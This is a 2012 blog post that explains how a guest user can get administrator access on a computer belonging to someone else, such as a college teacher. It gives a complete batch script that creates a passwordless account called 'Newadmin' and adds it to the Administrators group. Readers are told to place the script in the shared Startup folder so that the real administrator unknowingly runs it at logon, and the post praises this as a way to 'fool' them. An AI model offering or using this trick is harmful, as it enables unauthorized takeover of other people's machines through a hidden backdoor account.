Friday, May 25, 2012

How to Create administrator account from Guest Account

1 comment

Create administrator account from Guest Account


Most of the smart users(like the college teachers) only offer guest login to their computer as it has the minimum rights(and not things like installing a software or changing any system properties). In such a case we require an account with all the access rights just as the administrator has.




 You can create an administrator account from the guest account and fool the smart user by just following some simple steps :

 


Open Notepad, paste the following :

@echo off

net user Newadmin /add /expires:never /passwordreq:no

net localgroup “Administrators” /add Newadmin






create administrator account from guest account
 
And save it with anyname but with a .bat file extension.
save file with anyname and with .bat extension


Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup

And when your admin logs into the system, the new account will be automatically created without the notice of the user. Next time when you login, you will get the user account for you.


This tricks works because the admin is unintentionally making an account we want,this has happened because of the script we applied at the start up of all account

ENJOY!!! and have FUN :D
If You Enjoyed This, Take 5 Seconds To Share It

About Author:

Kunal Ganglani: I am a Passionate Blogger, a Computer Science Engineer, Internet Marketer and an Entrepreneur at heart. I am the founder and Admin at KGTricks.

Connect With Me @ | Facebook

1 comment:

  1. Thanks it works good, but you don't need to put it in the startup folder when it's a .bat file you just open it and log out and BOOM! there it is

    ReplyDelete

Related Posts Plugin for WordPress, Blogger...